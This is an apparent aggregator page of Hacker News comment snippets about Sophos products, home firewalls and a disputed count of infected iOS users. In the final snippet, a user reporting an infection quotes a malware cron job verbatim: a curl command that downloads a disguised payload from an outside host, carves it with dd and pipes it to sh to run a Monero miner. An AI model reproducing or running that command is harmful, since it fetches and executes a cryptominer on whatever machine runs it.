What Hacker News says?
I don't really need to prove it since you're claiming that 500 million "potential" installs somehow equates to "half a billion infected iOS users". They got the 500 million number from the number of users of WeChat in China. Unless every single WeChat user in China and every user of those apps downloaded that update (which was pulled in less than 48 hours), that 500 million is a maximum number. Additionally, because…

HN discussionI remember Astaro did this with their Astaro Security Gateway UTM solution. Provide a full featured software appliance for home users and hope the admins are so caught up that they don't want to change to another vendor at work. Astaro got acquired by Sophos in 2011 but I just checked, they still offer the Sophos UTM Gateway in a Home edition. https://www.sophos.com/en-us/free-tools/sophos-xg-firewall-h...

HN discussionEvery time I say this I feel like a shill because I worked for them briefly, but Sophos has a Home version of their UTM firewall (0). It has pros and cons, but overall I think it's pretty good (even after working there). Some other options include Sonicwall and pfsense, and I encourage others to post their suggestions as well. I haven't used SonicWall, though I have used pfsense strictly as a firewall. (0) http://ww…

HN discussionThere was a startup that addressed this issue of personal devices potentially leaking personal or business sensitive information. The idea was the device is protected all the time, not just while on the office network. They were Mojave Networks but looks like their website is no more. Acquired by Sophos... I started by configuring it to block everything by default and white listing the traffic I wanted to allow. HN discussionWhat a coincidence! Just today at work we've found malware on some of our servers. That malware added this cron job: /60 * * * curl http://img1.imagehousing.com/0/art-825604.jpg -k|dd skip=2316 bs=1|sh If you execute that command (without | sh part) and save output into .sh script, you'll see that it is running a miner (consuming lots of CPU) for this Monero pool: xmr.crypto-pool.fr:3333 See: https://www.sophos.com/…
